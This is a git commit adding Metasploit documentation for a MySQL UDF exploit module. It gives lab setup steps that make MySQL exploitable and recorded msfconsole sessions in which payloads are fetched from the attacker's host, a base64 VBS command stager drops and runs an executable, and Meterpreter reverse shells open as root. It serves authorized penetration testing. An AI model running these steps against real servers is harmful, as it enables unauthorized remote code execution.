forgot to add my docs

h00die · h00die · commit 9236aff6ee47 · 2017-11-04T13:51:41.000-04:00
diff --git a/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md b/documentation/modules/exploit/multi/mysql/mysql_udf_payload.md
@@ -0,0 +1,175 @@
+## Vulnerable Application
+
+This vulnerability expoits mysql by adding a .so or .dll file which has a system call in it to the plugins folder.
+The file is then loaded by mysql, and arbitrary commands can be run.  There are several caveats for this to
+function however, including:
+1. `secure_file_priv`, a mysql setting, must be changed from the default to allow writing
+to mysql's plugins folder
+2. on Ubuntu, apparmor needs a bunch of exceptions added, or to be disabled.  Equivalents on other linux systems most likely need the same
+3. the mysql folder must be writable
+
+### Linux (Ubuntu 16.04 x64) Configuration
+
+In this configuration, we'll run mysql as root so we have a priv escalate.
+
+ 1. Edit `/lib/systemd/system/mysql.service` and set `User=root`
+ 2. Edit `/etc/mysql/mysql.conf.d/mysqld.cnf`.  After the `[mysqld]` section, change `user=mysql` to `user=root` 
+ 3. Edit `/etc/mysql/mysql.conf.d/mysqld.cnf`.  After the `[mysqld]` section, add `secure_file_priv=""` 
+ 4. Disable app-armor for mysql: `sudo apparmor_parser -R /etc/apparmor.d/usr.sbin.mysqld`
+ 5. Restart mysql service: `sudo systemctl restart mysql.service`
+
+If you need to make the root user accessible remotely
+```
+GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED by 'password';
+FLUSH PRIVILEGES;
+```
+or
+```
+update user set host='%' where host='127.0.0.1';
+```
+
+### Windows (Server 2012 x64) Configuration
+
+One good reference for these instructions is [PR #5334](https://github.com/rapid7/metasploit-framework/pull/5334)
+
+  1. Download and install mysql installer
+  2. Install dependencies including, at the time of writing, Visual C++ 2013 Redistributable Package.
+  3. Edit `C:\ProgramData\MySQL\MySQL Server\MySQL Server *\my.ini` and change the value of `secure-file-priv=` to `""`
+  4. Make the `C:\Program Files\MySQL\MySQL Server *\lib\plugin` folder permissions writable by the MySQL (service) user.
+
+If you need to make the root user accessible remotely
+```
+GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED by 'password';
+FLUSH PRIVILEGES;
+```
+or
+```
+update user set host='%' where host='127.0.0.1';
+```
+
+## Verification Steps
+
+  1. Install MySQL and make it vulnerable as described above
+  2. Start msfconsole
+  3. Do: ```use exploit/multi/mysql/mysql_udf_payload```
+  4. Do: ```set rhost [ip]```
+  5. Do: ```set srvhost [ip]```
+  6. Make sure target and payload are correct
+  7. Set mysql login information
+  8. Do: ```exploit```
+  9. You should get a shell.
+
+## Options
+
+  **FORCE_UDF_UPLOAD**
+
+  This option will force the uploading of a UDF dll/so file even if one exists which has a system call already
+
+## Scenarios
+
+### Ubuntu 16.04 with MySQL 5.7.20
+
+In this case, the service has been configured as noted in the first section of this document, a remotely accessible MySQL running as root.
+
+```
+[*] Processing udf.rc for ERB directives.
+resource (udf.rc)> use exploit/multi/mysql/mysql_udf_payload
+resource (udf.rc)> set payload linux/x86/meterpreter/reverse_tcp
+payload => linux/x86/meterpreter/reverse_tcp
+resource (udf.rc)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (udf.rc)> set rhost 2.2.2.2
+rhost => 2.2.2.2
+resource (udf.rc)> set srvhost 1.1.1.1
+srvhost => 1.1.1.1
+resource (udf.rc)> set srvport 64423
+srvport => 64423
+resource (udf.rc)> set password wordpress
+password => wordpress
+resource (udf.rc)> set target 1
+target => 1
+resource (udf.rc)> set verbose true
+verbose => true
+msf exploit(mysql_udf_payload) > exploit
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 2.2.2.2:3306 - Checking target architecture...
+[*] 2.2.2.2:3306 - Checking for sys_exec()...
+[*] 2.2.2.2:3306 - sys_exec() already available, using that (override with FORCE_UDF_UPLOAD).
+[*] 2.2.2.2:3306 - Using URL: http://1.1.1.1:64423/YMDYyVp1fG
+[*] 2.2.2.2:3306 - Client 2.2.2.2 (Wget/1.17.1 (linux-gnu)) requested /YMDYyVp1fG
+[*] 2.2.2.2:3306 - Sending payload to 2.2.2.2 (Wget/1.17.1 (linux-gnu))
+[*] Transmitting intermediate stager...(106 bytes)
+[*] Sending stage (826872 bytes) to 2.2.2.2
+[*] Meterpreter session 4 opened (1.1.1.1:4444 -> 2.2.2.2:46330) at 2017-10-30 23:22:08 -0400
+[-] 2.2.2.2:3306 - Exploit failed: Rex::StreamClosedError Stream #<Socket:0x00561e7e1758e8> is closed.
+[*] 2.2.2.2:3306 - Server stopped.
+[*] Exploit completed, but no session was created.
+msf exploit(mysql_udf_payload) > sessions -i 4
+[*] Starting interaction with 4...
+
+meterpreter > sysinfo
+Computer     : 2.2.2.2
+OS           :  (Linux 4.4.0-98-generic)
+Architecture : x64
+Meterpreter  : x86/linux
+meterpreter > getuid
+Server username: uid=0, gid=0, euid=0, egid=0
+```
+
+### Windows Server 2012 with MySQL 5.7.20
+
+```
+[*] Processing udf.rc for ERB directives.
+resource (udf.rc)> use exploit/multi/mysql/mysql_udf_payload
+resource (udf.rc)> set lhost 1.1.1.1
+lhost => 1.1.1.1
+resource (udf.rc)> set srvhost 1.1.1.1
+srvhost => 1.1.1.1
+resource (udf.rc)> set srvport 64423
+srvport => 64423
+resource (udf.rc)> set verbose true
+verbose => true
+msf exploit(mysql_udf_payload) > set target 0
+target => 0
+msf exploit(mysql_udf_payload) > set payload windows/meterpreter/reverse_tcp
+payload => windows/meterpreter/reverse_tcp
+msf exploit(mysql_udf_payload) > set rhost 3.3.3.3
+rhost => 3.3.3.3
+msf exploit(mysql_udf_payload) > set password mysql
+password => mysql
+msf exploit(mysql_udf_payload) > exploit
+
+[*] Started reverse TCP handler on 1.1.1.1:4444 
+[*] 3.3.3.3:3306 - Checking target architecture...
+[*] 3.3.3.3:3306 - Checking for sys_exec()...
+[*] 3.3.3.3:3306 - Checking target architecture...
+[*] 3.3.3.3:3306 - Checking for MySQL plugin directory...
+[*] 3.3.3.3:3306 - Target arch (win64) and target path both okay.
+[*] 3.3.3.3:3306 - Uploading lib_mysqludf_sys_64.dll library to C:/Program Files/MySQL/MySQL Server 5.7/lib/plugin/jfAzUfJP.dll...
+[*] 3.3.3.3:3306 - Checking for sys_exec()...
+[*] 3.3.3.3:3306 - Executing: echo TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAACTOPDW11mehddZnoXXWZ6FrEWShdNZnoVURZCF3lmehbhGlIXcWZ6FuEaahdRZnoXXWZ+FHlmehVRRw4XfWZ6Fg3quhf9ZnoUQX5iF1lmehVJpY2jXWZ6FAAAAAAAAAAAAAAAAAAAAAFBFAABMAQQAyzSjSgAAAAAAAAAA4AAPAQsBBgAAsAAAAKAAAAAAAAB2HwAAABAAAADAAAAAAEAAABAAAAAQAAAEAAAAAAAAAAQAAAAAAAAAAGABAAAQAAAAAAAAAgAAAAAAEAAAEAAAAAAQAAAQAAAAAAAAEAAAAAAAAAAAAAAAbMcAAHgAAAAAUAEAyAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAODBAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADAAADgAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAALnRleHQAAABmqQAAABAAAACwAAAAEAAAAAAAAAAAAAAAAAAAIAAAYC5yZGF0YQAA5g8AAADAAAAAEAAAAMAAAAAAAAAAAAAAAAAAAEAAAEAuZGF0YQAAAFxwAAAA0AAAAEAAAADQAAAAAAAAAAAAAAAAAABAAADALnJzcmMAAADIBwAAAFABAAAQAAAAEAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\EkEiJ.b64
+[*] 3.3.3.3:3306 - Command Stager progress -   1.47% done (1499/102246 bytes)
+```
+...snip...
+```
+[*] 3.3.3.3:3306 - Executing: echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\EkEiJ.b64
+[*] 3.3.3.3:3306 - Command Stager progress -  96.76% done (98934/102246 bytes)
+[*] 3.3.3.3:3306 - Executing: echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%TEMP%\EkEiJ.b64 & echo Set fs = CreateObject("Scripting.FileSystemObject") >>%TEMP%\GTKoi.vbs & echo Set file = fs.GetFile("%TEMP%\EkEiJ.b64") >>%TEMP%\GTKoi.vbs & echo If file.Size Then >>%TEMP%\GTKoi.vbs & echo Set fd = fs.OpenTextFile("%TEMP%\EkEiJ.b64", 1) >>%TEMP%\GTKoi.vbs & echo data = fd.ReadAll >>%TEMP%\GTKoi.vbs & echo data = Replace(data, vbCrLf, "") >>%TEMP%\GTKoi.vbs & echo data = base64_decode(data) >>%TEMP%\GTKoi.vbs & echo fd.Close >>%TEMP%\GTKoi.vbs
+[*] 3.3.3.3:3306 - Command Stager progress -  98.19% done (100400/102246 bytes)
+[*] 3.3.3.3:3306 - Executing: echo Set ofs = CreateObject("Scripting.FileSystemObject").OpenTextFile("%TEMP%\CVVsw.exe", 2, True) >>%TEMP%\GTKoi.vbs & echo ofs.Write data >>%TEMP%\GTKoi.vbs & echo ofs.close >>%TEMP%\GTKoi.vbs & echo Set shell = CreateObject("Wscript.Shell") >>%TEMP%\GTKoi.vbs & echo shell.run "%TEMP%\CVVsw.exe", 0, false >>%TEMP%\GTKoi.vbs & echo Else >>%TEMP%\GTKoi.vbs & echo Wscript.Echo "The file is empty." >>%TEMP%\GTKoi.vbs & echo End If >>%TEMP%\GTKoi.vbs & echo Function base64_decode(byVal strIn) >>%TEMP%\GTKoi.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%TEMP%\GTKoi.vbs & echo For n = 1 To Len(strIn) Step 4 >>%TEMP%\GTKoi.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%TEMP%\GTKoi.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%TEMP%\GTKoi.vbs & echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>%TEMP%\GTKoi.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%TEMP%\GTKoi.vbs & echo If Not w2 Then _ >>%TEMP%\GTKoi.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%TEMP%\GTKoi.vbs & echo If  Not w3 Then _ >>%TEMP%\GTKoi.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%TEMP%\GTKoi.vbs & echo If Not w4 Then _ >>%TEMP%\GTKoi.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%TEMP%\GTKoi.vbs & echo Next >>%TEMP%\GTKoi.vbs & echo base64_decode = strOut >>%TEMP%\GTKoi.vbs & echo End Function >>%TEMP%\GTKoi.vbs & echo Function mimedecode(byVal strIn) >>%TEMP%\GTKoi.vbs
+[*] 3.3.3.3:3306 - Command Stager progress -  99.59% done (101827/102246 bytes)
+[*] 3.3.3.3:3306 - Executing: echo Base64Chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/" >>%TEMP%\GTKoi.vbs & echo If Len(strIn) = 0 Then >>%TEMP%\GTKoi.vbs & echo mimedecode = -1 : Exit Function >>%TEMP%\GTKoi.vbs & echo Else >>%TEMP%\GTKoi.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\GTKoi.vbs & echo End If >>%TEMP%\GTKoi.vbs & echo End Function >>%TEMP%\GTKoi.vbs & cscript //nologo %TEMP%\GTKoi.vbs
+[*] 3.3.3.3:3306 - Command Stager progress - 100.00% done (102246/102246 bytes)
+[*] Sending stage (179267 bytes) to 3.3.3.3
+[*] Meterpreter session 5 opened (1.1.1.1:4444 -> 3.3.3.3:49165) at 2017-11-02 23:12:07 -0400
+
+meterpreter > sysinfo
+Computer        : WIN-OBKF2JFCDKL
+OS              : Windows 2012 (Build 9200).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+```
